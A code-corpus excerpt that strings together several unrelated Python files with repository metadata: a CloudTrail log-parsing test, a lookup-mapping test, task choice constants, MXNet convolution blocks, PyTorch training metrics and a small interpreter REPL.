"ddsource": "cloudtrail",
"ddsourcecategory": "aws",
"service": "cloudtrail",
"aws": {
"s3": {
"bucket": payload["s3"]["bucket"]["name"],
"key": payload["s3"]["object"]["key"],
},
"function_version": context.function_version,
"invoked_function_arn": context.invoked_function_arn,
},
}
)
# yeah, there are tags, but we don't care to compare them
result[0].pop("ddtags")
# expected parsed result, now testing enrichment
self.assertEqual(expected[0], result[0])
expected[0]["host"] = "i-08014e4f62ccf762d"
self.assertEqual(expected[0], lambda_function.enrich(result)[0])
if __name__ == "__main__":
unittest.main()
| 32.231788
| 115
| 0.543661
| 1,861
| 0.382371
| 0
| 0
| 1,602
| 0.329156
| 0
| 0
| 1,958
| 0.402301
|
12fc144c5d332d1edd841f8f777a22d5c30bf0b9
| 487
|
py
|
Python
|
ch_06/tests/test_lookup_mapping.py
|
real-slim-chadi/Python-Object-Oriented-Programming---4th-edition
|
7c486866171786b620795fa33a79ec9ac9a8ba1b
|
[
"MIT"
] | 43
|
2021-06-03T18:39:09.000Z
|
2022-03-29T20:32:13.000Z
|
ch_06/tests/test_lookup_mapping.py
|
real-slim-chadi/Python-Object-Oriented-Programming---4th-edition
|
7c486866171786b620795fa33a79ec9ac9a8ba1b
|
[
"MIT"
] | 16
|
2022-02-08T22:41:30.000Z
|
2022-03-25T22:48:28.000Z
|
ch_06/tests/test_lookup_mapping.py
|
real-slim-chadi/Python-Object-Oriented-Programming---4th-edition
|
7c486866171786b620795fa33a79ec9ac9a8ba1b
|
[
"MIT"
] | 36
|
2021-06-19T07:14:09.000Z
|
2022-03-12T22:17:09.000Z
|
"""
Python 3 Object-Oriented Programming
Chapter 6, Abstract Base Classes and Operator Overloading
"""
from lookup_mapping import Lookup
def test_lookup_mapping():
x = Lookup(
[
["z", "Zillah"],
["a", "Amy"],
["c", "Clara"],
["b", "Basil"],
]
)
assert "a" in x
assert "d" not in x
assert len(x) == 4
assert x["a"] == "Amy"
assert x["z"] == "Zillah"
assert list(x) == ["a", "b", "c", "z"]
| 20.291667
| 57
| 0.486653
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 179
| 0.367556
|
12fd58577de1528a698dc2d572273da89af94b00
| 217
|
py
|
Python
|
serempre_todo/utils/choices.py
|
pygabo/Serempre
|
6b29e337abd8d1b3f71ee889d318a2d473d6c744
|
[
"MIT"
] | null | null | null |
serempre_todo/utils/choices.py
|
pygabo/Serempre
|
6b29e337abd8d1b3f71ee889d318a2d473d6c744
|
[
"MIT"
] | null | null | null |
serempre_todo/utils/choices.py
|
pygabo/Serempre
|
6b29e337abd8d1b3f71ee889d318a2d473d6c744
|
[
"MIT"
] | null | null | null |
TASK_STATUS = [
('TD', 'To Do'),
('IP', 'In Progress'),
('QA', 'Testing'),
('DO', 'Done'),
]
TASK_PRIORITY = [
('ME', 'Medium'),
('HI', 'Highest'),
('HG', 'High'),
('LO', 'Lowest'),
]
| 15.5
| 26
| 0.40553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 98
| 0.451613
|
12fda5a81fde9ab3c46b39a497e89d5ab29b6639
| 17,673
|
py
|
Python
|
symbols/block.py
|
zerofo/sdu-face-alignment
|
f4b57fde0576d2327369884fd5d5e9a7765a0790
|
[
"MIT"
] | 192
|
2019-03-27T02:40:41.000Z
|
2022-03-18T15:35:17.000Z
|
symbols/block.py
|
zerofo/sdu-face-alignment
|
f4b57fde0576d2327369884fd5d5e9a7765a0790
|
[
"MIT"
] | 4
|
2019-04-01T14:51:22.000Z
|
2020-11-25T08:22:04.000Z
|
symbols/block.py
|
zerofo/sdu-face-alignment
|
f4b57fde0576d2327369884fd5d5e9a7765a0790
|
[
"MIT"
] | 38
|
2019-03-30T05:33:48.000Z
|
2021-10-01T06:08:17.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import mxnet as mx
import numpy as np
from config import config
def Conv(**kwargs):
body = mx.sym.Convolution(**kwargs)
return body
def Act(data, act_type, name):
if act_type=='prelu':
body = mx.sym.LeakyReLU(data = data, act_type='prelu', name = name)
else:
body = mx.symbol.Activation(data=data, act_type=act_type, name=name)
return body
def ConvFactory(data, num_filter, kernel, stride=(1, 1), pad=(0, 0), act_type="relu", mirror_attr={}, with_act=True, dcn=False, name=''):
bn_mom = config.bn_mom
workspace = config.workspace
if not dcn:
conv = mx.symbol.Convolution(
data=data, num_filter=num_filter, kernel=kernel, stride=stride, pad=pad, no_bias=True, workspace=workspace, name=name+'_conv')
else:
conv_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = data,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=data, offset=conv_offset,
num_filter=num_filter, pad=(1,1), kernel=(3,3), num_deformable_group=1, stride=stride, dilate=(1, 1), no_bias=False)
bn = mx.symbol.BatchNorm(data=conv, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name+'_bn')
if with_act:
act = Act(bn, act_type, name=name+'_relu')
#act = mx.symbol.Activation(
# data=bn, act_type=act_type, attr=mirror_attr, name=name+'_relu')
return act
else:
return bn
def conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
bit = 1
ACT_BIT = config.ACT_BIT
bn_mom = config.bn_mom
workspace = config.workspace
memonger = config.memonger
#print('in unit2')
# the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
if not binarize:
act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
else:
act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
conv1 = mx.sym.QConvolution(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
if not binarize:
act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
conv2 = Conv(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
else:
act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
conv2 = mx.sym.QConvolution(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if not binarize:
act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
conv3 = Conv(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
else:
act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
conv3 = mx.sym.QConvolution(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
#if binarize:
# conv3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if dim_match:
shortcut = data
else:
if not binarize:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
else:
shortcut = mx.sym.QConvolution(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv3 + shortcut
def conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilation, **kwargs):
bit = 1
ACT_BIT = config.ACT_BIT
bn_mom = config.bn_mom
workspace = config.workspace
memonger = config.memonger
#print('in unit2')
# the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
if not binarize:
act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
if not dcn:
conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv1')
else:
conv1_offset = mx.symbol.Convolution(name=name+'_conv1_offset', data = act1,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv1 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv1', data=act1, offset=conv1_offset,
num_filter=int(num_filter*0.5), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
if not binarize:
act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
if not dcn:
conv2 = Conv(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv2')
else:
conv2_offset = mx.symbol.Convolution(name=name+'_conv2_offset', data = act2,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv2 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv2', data=act2, offset=conv2_offset,
num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
conv2 = mx.sym.QConvolution_v1(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if not binarize:
act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
if not dcn:
conv3 = Conv(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv3')
else:
conv3_offset = mx.symbol.Convolution(name=name+'_conv3_offset', data = act3,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv3 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv3', data=act3, offset=conv3_offset,
num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
conv3 = mx.sym.QConvolution_v1(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
conv4 = mx.symbol.Concat(*[conv1, conv2, conv3])
if binarize:
conv4 = mx.sym.BatchNorm(data=conv4, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if dim_match:
shortcut = data
else:
if not binarize:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
else:
#assert(False)
shortcut = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
shortcut = mx.sym.BatchNorm(data=shortcut, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc_bn')
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv4 + shortcut
#return bn4 + shortcut
#return act4 + shortcut
def block17(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
tower_conv = ConvFactory(net, 192, (1, 1), name=name+'_conv')
tower_conv1_0 = ConvFactory(net, 129, (1, 1), name=name+'_conv1_0')
tower_conv1_1 = ConvFactory(tower_conv1_0, 160, (1, 7), pad=(1, 2), name=name+'_conv1_1')
tower_conv1_2 = ConvFactory(tower_conv1_1, 192, (7, 1), pad=(2, 1), name=name+'_conv1_2')
tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_2])
tower_out = ConvFactory(
tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
net = net+scale * tower_out
if with_act:
act = mx.symbol.Activation(
data=net, act_type=act_type, attr=mirror_attr)
return act
else:
return net
def block35(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
M = 1.0
tower_conv = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv')
tower_conv1_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv1_0')
tower_conv1_1 = ConvFactory(tower_conv1_0, int(input_num_channels*0.25*M), (3, 3), pad=(1, 1), name=name+'_conv1_1')
tower_conv2_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv2_0')
tower_conv2_1 = ConvFactory(tower_conv2_0, int(input_num_channels*0.375*M), (3, 3), pad=(1, 1), name=name+'_conv2_1')
tower_conv2_2 = ConvFactory(tower_conv2_1, int(input_num_channels*0.5*M), (3, 3), pad=(1, 1), name=name+'_conv2_2')
tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_1, tower_conv2_2])
tower_out = ConvFactory(
tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
net = net+scale * tower_out
if with_act:
act = mx.symbol.Activation(
data=net, act_type=act_type, attr=mirror_attr)
return act
else:
return net
def conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
assert not binarize
if stride[0]>1 or not dim_match:
return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
conv4 = block35(data, num_filter, name=name+'_block35')
return conv4
def conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
workspace = config.workspace
if stride[0]>1 or not dim_match:
return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
cab = CAB(data, num_filter, 1, 4, workspace, name, dilate, 1)
return cab.get()
def conv_block(data, num_filter, stride, dim_match, name, binarize, dcn, dilate):
if config.net_block=='resnet':
return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='inception':
return conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='hpm':
return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='cab':
return conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
#def lin(data, num_filter, workspace, name, binarize, dcn):
# bit = 1
# ACT_BIT = config.ACT_BIT
# bn_mom = config.bn_mom
# workspace = config.workspace
# if not binarize:
# if not dcn:
# conv1 = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
# no_bias=True, workspace=workspace, name=name + '_conv')
# bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# return act1
# else:
# bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# conv1_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = act1,
# num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
# conv1 = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=act1, offset=conv1_offset,
# num_filter=num_filter, pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=False)
# #conv1 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
# # no_bias=False, workspace=workspace, name=name + '_conv')
# return conv1
# else:
# bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
# no_bias=True, workspace=workspace, name=name + '_conv', act_bit=ACT_BIT, weight_bit=bit)
# conv1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
# return conv1
def lin3(data, num_filter, workspace, name, k, g=1, d=1):
bn_mom = config.bn_mom
workspace = config.workspace
if k!=3:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=((k-1)//2,(k-1)//2), num_group=g,
no_bias=True, workspace=workspace, name=name + '_conv')
else:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=(d,d), num_group=g, dilate=(d, d),
no_bias=True, workspace=workspace, name=name + '_conv')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
ret = act1
return ret
class CAB:
def __init__(self, data, nFilters, nModules, n, workspace, name, dilate, group):
self.data = data
self.nFilters = nFilters
self.nModules = nModules
self.n = n
self.workspace = workspace
self.name = name
self.dilate = dilate
self.group = group
self.sym_map = {}
def get_output(self, w, h):
key = (w, h)
if key in self.sym_map:
return self.sym_map[key]
ret = None
if h==self.n:
if w==self.n:
ret = (self.data, self.nFilters)
else:
x = self.get_output(w+1, h)
f = int(x[1]*0.5)
if w!=self.n-1:
body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, 1)
else:
body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, self.dilate)
ret = (body,f)
else:
x = self.get_output(w+1, h+1)
y = self.get_output(w, h+1)
if h%2==1 and h!=w:
xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
#xbody = xbody+x[0]
else:
xbody = x[0]
#xbody = x[0]
#xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
if w==0:
ybody = lin3(y[0], y[1], self.workspace, "%s_w%d_h%d_3"%(self.name, w, h), 3, self.group)
else:
ybody = y[0]
ybody = mx.sym.concat(y[0], ybody, dim=1)
body = mx.sym.add_n(xbody,ybody, name="%s_w%d_h%d_add"%(self.name, w, h))
body = body/2
ret = (body, x[1])
self.sym_map[key] = ret
return ret
def get(self):
return self.get_output(1, 1)[0]
| 54.378462
| 148
| 0.62106
| 1,911
| 0.108131
| 0
| 0
| 0
| 0
| 0
| 0
| 3,220
| 0.182199
|
12fde371c750b67c435196b6031afbfb913cf73d
| 9,198
|
py
|
Python
|
train/metric.py
|
alexandrosstergiou/Squeeze-and-Recursion-Temporal-Gates
|
1641b59b73c951a5b05d17b5528894ae73a014b8
|
[
"MIT"
] | 54
|
2020-06-16T08:11:21.000Z
|
2022-03-18T14:54:52.000Z
|
train/metric.py
|
alexandrosstergiou/Squeeze-and-Recursion-Temporal-Gates
|
1641b59b73c951a5b05d17b5528894ae73a014b8
|
[
"MIT"
] | 10
|
2020-06-23T07:57:45.000Z
|
2021-12-16T04:18:03.000Z
|
train/metric.py
|
alexandrosstergiou/Squeeze-and-Recursion-Temporal-Gates
|
1641b59b73c951a5b05d17b5528894ae73a014b8
|
[
"MIT"
] | 7
|
2020-09-12T12:46:54.000Z
|
2021-11-15T09:00:55.000Z
|
'''
--- I M P O R T S T A T E M E N T S ---
'''
import coloredlogs, logging
coloredlogs.install()
import numpy as np
'''
=== S T A R T O F C L A S S E V A L M E T R I C ===
[About]
Object class for calculating average values.
[Init Args]
- name: String for the variable name to calculate average value for.
[Methods]
- __init__ : Class initialiser
- update : Function to be implemented by the children sub-classes.
- reset : Function for resetting the number of instances and the sum of the metric.
- get : Calculation of the average value based on the number of instances and the provided sum.
- get_name_value : Function for returning the name(s) and the value(s).
- check_label_shapes : Function responsible for type and shape checking.
'''
class EvalMetric(object):
def __init__(self, name, **kwargs):
self.name = str(name)
self.reset()
def update(self, preds, labels, losses, lr, batch_size):
raise NotImplementedError('Must be implemented in child classes!')
def reset(self):
self.num_inst = 0
self.sum_metric = 0.0
def get(self):
# case that instances are 0 -> return NaN
if self.num_inst == 0:
return (self.name, float('nan'))
# case that instances are 1 -> return their sum
if self.num_inst == 1:
return(self.name, self.sum_metric)
# case that instances are >1 -> return average
else:
return (self.name, self.sum_metric / self.num_inst)
def get_name_value(self):
name, value = self.get()
if not isinstance(name, list):
name = [name]
if not isinstance(value, list):
value = [value]
return list(zip(name, value))
def check_label_shapes(self, preds, labels):
# raise if the shape is inconsistent
if (type(labels) is list) and (type(preds) is list):
label_shape, pred_shape = len(labels), len(preds)
else:
label_shape, pred_shape = labels.shape[0], preds.shape[0]
if label_shape != pred_shape:
raise NotImplementedError("")
'''
=== E N D O F C L A S S E V A L M E T R I C ===
'''
'''
=== S T A R T O F C L A S S M E T R I C L I S T ===
[About]
EvalMetric class for creating a list containing Evalmetric objects.
[Init Args]
- name: String for the variable name.
[Methods]
- __init__ : Class initialiser
- update : Function to update the list of EvalMetric objects.
- reset : Function for resetting the list.
- get : Function for getting each of the EvalMetric objects in the list.
- get_name_value : Function for getting the name of the list items.
'''
class MetricList(EvalMetric):
def __init__(self, *args, name="metric_list"):
assert all([issubclass(type(x), EvalMetric) for x in args]), \
"MetricList input is illegal: {}".format(args)
self.metrics = [metric for metric in args]
super(MetricList, self).__init__(name=name)
def update(self, preds, labels, losses=None, lr=None, batch_size=None):
preds = [preds] if type(preds) is not list else preds
labels = [labels] if type(labels) is not list else labels
losses = [losses] if type(losses) is not list else losses
lr = [lr] if type(lr) is not list else lr
batch_size = [batch_size] if type(batch_size) is not list else batch_size
for metric in self.metrics:
metric.update(preds, labels, losses, lr, batch_size)
def reset(self):
if hasattr(self, 'metrics'):
for metric in self.metrics:
metric.reset()
else:
logging.warning("No metric defined.")
def get(self):
ouputs = []
for metric in self.metrics:
ouputs.append(metric.get())
return ouputs
def get_name_value(self):
ouputs = []
for metric in self.metrics:
ouputs.append(metric.get_name_value())
return ouputs
'''
=== E N D O F C L A S S M E T R I C L I S T ===
'''
'''
=== S T A R T O F C L A S S A C C U R A C Y ===
[About]
EvalMetric class for creating an accuracy estimate.
[Init Args]
- name: String for the variable name. Defaults to `accuracy`.
- topk: Number of top predictions to be used of the score (top-1, top-5 etc.).
Defaults to 1.
[Methods]
- __init__ : Class initialiser
- update : Function to update scores.
'''
class Accuracy(EvalMetric):
def __init__(self, name='accuracy', topk=1):
super(Accuracy, self).__init__(name)
self.topk = topk
def update(self, preds, labels, losses, lr, batch_size):
preds = [preds] if type(preds) is not list else preds
labels = [labels] if type(labels) is not list else labels
self.check_label_shapes(preds, labels)
for pred, label in zip(preds, labels):
assert self.topk <= pred.shape[1], \
"topk({}) should no larger than the pred dim({})".format(self.topk, pred.shape[1])
_, pred_topk = pred.topk(self.topk, 1, True, True)
pred_topk = pred_topk.t()
correct = pred_topk.eq(label.view(1, -1).expand_as(pred_topk))
self.sum_metric += float(correct.reshape(-1).float().sum(0, keepdim=True).numpy())
self.num_inst += label.shape[0]
'''
=== E N D O F C L A S S A C C U R A C Y ===
'''
'''
=== S T A R T O F C L A S S L O S S ===
[About]
EvalMetric class for creating a loss score. The class acts a a `dummy estimate`
as no further calculations are required for the loss. Instead it is primarily
used to easily/directly print the loss.
[Init Args]
- name: String for the variable name. Defaults to `loss`.
[Methods]
- __init__ : Class initialiser
- update : Function to update scores.
'''
class Loss(EvalMetric):
def __init__(self, name='loss'):
super(Loss, self).__init__(name)
def update(self, preds, labels, losses, lr, batch_size):
assert losses is not None, "Loss undefined."
for loss in losses:
self.sum_metric += float(loss.numpy().sum())
self.num_inst += 1
'''
=== E N D O F C L A S S L O S S ===
'''
'''
=== S T A R T O F C L A S S L O S S ===
[About]
EvalMetric class for batch-size used. The class acts a a `dummy estimate`
as no further calculations are required for the size of the batch. Instead it is primarily
used to easily/directly print the batch size.
[Init Args]
- name: String for the variable name. Defaults to `batch-size`.
[Methods]
- __init__ : Class initialiser
- update : Function used for updates.
'''
class BatchSize(EvalMetric):
def __init__(self, name='batch-size'):
super(BatchSize, self).__init__(name)
def update(self, preds, labels, losses, lrs, batch_sizes):
assert batch_sizes is not None, "Batch size undefined."
self.sum_metric = batch_sizes
self.num_inst = 1
'''
=== E N D O F C L A S S L O S S ===
'''
'''
=== S T A R T O F C L A S S L E A R N I N G R A T E ===
[About]
EvalMetric class for learning rate used. The class acts a a `dummy estimate`
as no further calculations are required for the size of the lr. Instead it is primarily
used to easily/directly print the learning rate.
[Init Args]
- name: String for the variable name. Defaults to `lr`.
[Methods]
- __init__ : Class initialiser
- update : Function used for updates.
'''
class LearningRate(EvalMetric):
def __init__(self, name='lr'):
super(LearningRate, self).__init__(name)
def update(self, preds, labels, losses, lrs, batch_sizes):
assert lrs is not None, "Learning rate undefined."
self.sum_metric = lrs[-1]
self.num_inst = 1
'''
=== E N D O F C L A S S L E A R N I N G R A T E ===
'''
if __name__ == "__main__":
import torch
# Test Accuracy
predicts = [torch.from_numpy(np.array([[0.7, 0.3], [0, 1.], [0.4, 0.6]]))]
labels = [torch.from_numpy(np.array([ 0, 1, 1 ]))]
losses = [torch.from_numpy(np.array([ 0.3, 0.4, 0.5 ]))]
logging.getLogger().setLevel(logging.DEBUG)
logging.debug("input pred: {}".format(predicts))
logging.debug("input label: {}".format(labels))
logging.debug("input loss: {}".format(labels))
acc = Accuracy()
acc.update(preds=predicts, labels=labels, losses=losses, lr=0, batch_size=1)
logging.info(acc.get())
# Test MetricList
metrics = MetricList(Loss(name="ce-loss"),
Accuracy(topk=1, name="acc-top1"),
Accuracy(topk=2, name="acc-top2"),
)
metrics.update(preds=predicts, labels=labels, losses=losses, lr=0, batch_size=1)
logging.info("------------")
logging.info(metrics.get())
acc.get_name_value()
| 30.356436
| 103
| 0.593064
| 4,506
| 0.489889
| 0
| 0
| 0
| 0
| 0
| 0
| 4,130
| 0.449011
|
12fe867458db015f3b4f5fd16c3634fc1b9c4dae
| 3,018
|
py
|
Python
|
poly/repl.py
|
jdanford/poly
|
4f3a242dbb54fb68375a310af943be759588f459
|
[
"0BSD"
] | null | null | null |
poly/repl.py
|
jdanford/poly
|
4f3a242dbb54fb68375a310af943be759588f459
|
[
"0BSD"
] | null | null | null |
poly/repl.py
|
jdanford/poly
|
4f3a242dbb54fb68375a310af943be759588f459
|
[
"0BSD"
] | null | null | null |
import sys
from string import whitespace
from clint.textui import puts, indent, colored
from poly.common import *
from poly.node import *
def repl_main(args):
repl = Repl("repl")
repl.run()
class UndefinedCommandError(PolyError):
def __init__(self, command):
self.message = "Undefined command '{}'".format(command)
class Repl:
def __init__(self, name, in_prompt=None, out_prompt=None):
self.node = Node(name)
if in_prompt is None:
in_prompt = ">> "
self.in_prompt = in_prompt
if out_prompt is None:
out_prompt = "\n" + " " * len(in_prompt)
self.out_prompt = out_prompt
try:
self.node.load_module("prelude.poly", "")
except ModuleError as e:
self.print_error(e)
def run(self):
self.print_banner("Poly 0.0")
while True:
s, is_command = self.get_input()
if is_command:
try:
exit = self.handle_command(s)
except UndefinedCommandError as e:
self.print_error(e)
exit = False
if exit:
break
else:
continue
try:
expr = self.node.read(s)
self.eval_and_print(expr)
except PolyError as e:
self.print_error(e)
def eval_and_print(self, expr0):
expr1 = self.node.eval(expr0)
self.print_result(expr1)
self.node.env.table["$"] = expr1
def handle_command(self, cmd):
if cmd in ["q", "quit"]:
return True
elif cmd[0] == " ":
self.print_warning(cmd[1:])
else:
raise UndefinedCommandError(cmd)
return False
def get_input(self):
while True:
try:
prompt = self.in_prompt
puts(prompt, newline=False)
s = input().strip()
if empty_space(s):
continue
elif s[0] == ":":
return s[1:], True
else:
return s, False
except (EOFError, KeyboardInterrupt):
puts()
return "quit", True
def print_banner(self, s, width=72):
line = "-" * width
puts(line)
puts(s)
puts(line + "\n")
def print_result(self, expr):
prompt = colored.blue(self.out_prompt)
puts(prompt + str(expr) + "\n")
def print_str(self, s):
puts(s)
def print_warning(self, s):
sign = colored.yellow("Warning: ")
puts(sign + s + "\n")
def print_error(self, e):
sign = colored.red("Error: ")
puts(sign + e.message + "\n")
def empty_space(s):
if len(s) == 0:
return True
for c in s:
if s in whitespace:
return True
return False
if __name__ == "__main__":
repl_main(sys.argv[1:])
| 23.578125
| 63
| 0.503313
| 2,609
| 0.86448
| 0
| 0
| 0
| 0
| 0
| 0
| 141
| 0.04672
|
12fea94d07f9c12bbbce2e89b9de91f96defafac
| 1,330
|
py
|
Python
|
